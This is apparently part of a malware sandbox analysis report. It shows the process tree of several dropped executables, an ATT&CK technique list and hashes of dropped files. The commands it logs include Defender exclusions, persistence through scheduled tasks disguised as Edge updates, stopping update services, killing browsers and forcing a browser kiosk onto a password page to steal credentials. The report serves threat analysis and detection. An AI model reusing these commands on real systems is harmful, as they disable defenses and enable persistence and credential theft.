        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2312
  - - C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
      "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:6864
    - - C:\Users\Admin\AppData\Local\Temp\is-05PJO.tmp\FunnyJellyfish.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-05PJO.tmp\FunnyJellyfish.tmp" /SL5="$C003E,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:6912
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:796
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 3
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:6980
        
        C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\is-GF6G4.tmp\FunnyJellyfish.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GF6G4.tmp\FunnyJellyfish.tmp" /SL5="$90230,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:6140
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
        9⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2616
        
        C:\Windows\system32\regsvr32.exe
        
        /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
        10⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{BCDE01A5-F35A-4067-FC4A-A65B33784942}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5696
  - - C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe
      "C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:5920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7160
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5832
  - - C:\Users\Admin\AppData\Local\Temp\1008072001\8214b4dbe2.exe
      "C:\Users\Admin\AppData\Local\Temp\1008072001\8214b4dbe2.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2232
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        
        PID:1064
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd4,0x108,0x7ffa2fc1cc40,0x7ffa2fc1cc4c,0x7ffa2fc1cc58
        6⤵
        
        PID:6164
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2332,i,6298936877481591798,1973221712089396489,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2328 /prefetch:2
        6⤵
        Drops file in Program Files directory
        
        PID:6768
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1800,i,6298936877481591798,1973221712089396489,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:3
        6⤵
        
        PID:5256
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1984,i,6298936877481591798,1973221712089396489,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2552 /prefetch:8
        6⤵
        
        PID:6740
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,6298936877481591798,1973221712089396489,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5984
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,6298936877481591798,1973221712089396489,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4808
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4620,i,6298936877481591798,1973221712089396489,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4648 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:440
    - - C:\Users\Admin\AppData\Local\Temp\service123.exe
        
        "C:\Users\Admin\AppData\Local\Temp\service123.exe"
        5⤵
        
        PID:3960
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6484
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 1864
        5⤵
        Program crash
        
        PID:7148
  - - C:\Users\Admin\AppData\Local\Temp\1008073001\c145410f7e.exe
      "C:\Users\Admin\AppData\Local\Temp\1008073001\c145410f7e.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1300
  - - C:\Users\Admin\AppData\Local\Temp\1008074001\5948d66f9b.exe
      "C:\Users\Admin\AppData\Local\Temp\1008074001\5948d66f9b.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1432
  - - C:\Users\Admin\AppData\Local\Temp\1008075001\d930301bec.exe
      "C:\Users\Admin\AppData\Local\Temp\1008075001\d930301bec.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:6104
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:6172
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:4440
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3652
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:3768
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5576
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:1504
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3564
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:6532
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        6⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3660
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a15493bb-c8a8-4aa1-9c54-a7ed5431b096} 3660 "\\.\pipe\gecko-crash-server-pipe.3660" gpu
        7⤵
        
        PID:4804
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26f5005e-23f8-4085-a323-a4c76f9c28c9} 3660 "\\.\pipe\gecko-crash-server-pipe.3660" socket
        7⤵
        
        PID:2388
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3032 -childID 1 -isForBrowser -prefsHandle 3004 -prefMapHandle 2976 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a994544-68b2-413c-99b1-84656a4f4e5a} 3660 "\\.\pipe\gecko-crash-server-pipe.3660" tab
        7⤵
        
        PID:6792
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3856 -childID 2 -isForBrowser -prefsHandle 2796 -prefMapHandle 3408 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {908e8dee-4a0e-4cfa-bc41-8ea48f7d9311} 3660 "\\.\pipe\gecko-crash-server-pipe.3660" tab
        7⤵
        
        PID:4492
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4980 -prefMapHandle 4972 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5ec3956-e40c-4679-b40a-2f9f733678e5} 3660 "\\.\pipe\gecko-crash-server-pipe.3660" utility
        7⤵
        Checks processor information in registry
        
        PID:2264
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5516 -childID 3 -isForBrowser -prefsHandle 5532 -prefMapHandle 5524 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d95f0b39-c08d-4c1a-8243-b1a5b2fec6b3} 3660 "\\.\pipe\gecko-crash-server-pipe.3660" tab
        7⤵
        
        PID:6628
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 4 -isForBrowser -prefsHandle 5636 -prefMapHandle 5648 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dda2761-b417-4bfc-aa18-06c85c6f4373} 3660 "\\.\pipe\gecko-crash-server-pipe.3660" tab
        7⤵
        
        PID:6972
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5908 -childID 5 -isForBrowser -prefsHandle 5828 -prefMapHandle 5832 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8bb0bb7-21bb-43f7-8e34-5452187c2623} 3660 "\\.\pipe\gecko-crash-server-pipe.3660" tab
        7⤵
        
        PID:2016
  - - C:\Users\Admin\AppData\Local\Temp\1008076001\648f232405.exe
      "C:\Users\Admin\AppData\Local\Temp\1008076001\648f232405.exe"
      4⤵
      PID:6028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3748

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3940

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4744

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:1988

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4268

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2996

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:5056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3196

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:2940

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3896

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4964

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:6380

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:7000

C:\ProgramData\Mig\Mig.exe
C:\ProgramData\Mig\Mig.exe
1⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
PID:3464
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6352
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:6028
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6232
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:452
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3260
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6364
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:7124
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6636
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6032
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6760
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3928
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3008
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1464
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4876
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2980
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7124
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5172
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4580
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:6368
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:640
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3664
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:1424
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:944

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:6868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2232 -ip 2232
1⤵
PID:3492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
328B

MD5
bcd33c9ea658a98e6e7cb08bd0ed7332

SHA1
9500321c0f6301f0b5712373a38611514fb1dd6b

SHA256
dca95618d6dc88d4622a05f7761d6bfc3b2ecf9f94ad86206d090a2dad95d204

SHA512
7ea80185fc97bbb2b46bdbfccde208842f566f903eb0baa58bb2fbf4a62b1394c0265d6d17194079e12a0d288ef0edcbfe1e2bc575f21d8cfa0cea74679b2635

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d99e2eb22cc31513133239b1978fe368

SHA1
2baf5870d09668625aed60de0ede0ba8d7606bf1

SHA256
e7ff85f182b8a77a7266d346b00b42a384e4c09bc6612186d87a9e6b77a695bd

SHA512
d1990ed721f7592b6f51212bd8f1f60a48a43df66369b37b5e0a4660fc2c1eda12fd3117cec9bdcf70200d87ef56f6be52e18d1cf1248fe58ef59cdace77e0b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e0b043ae837c3a17771dddc6e292c4f

SHA1
8e2b006e8202bde3046020902ca4613bfa303612

SHA256
a33a2506b15ab9847df0f1d8adbc6aa7d12bb2b52ee8d2bc102dc80d20ff71e0

SHA512
9d7c646348e8a02a3fae1e0f7fc519e933ba692cf217ef570625de82994551b2a617b437e4109b6f620d455eb3f8df5113ce8390d30dd21d9e6fea364b40b35c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
aa0f2e01e208ce2ebcf74791f8f93023

SHA1
8b777306a55520a4e8c554eec40fdffcef9db7c3

SHA256
911249dcd118538a7d80cf4fe75671cbf6b6ea02001776389fad591d006f83e2
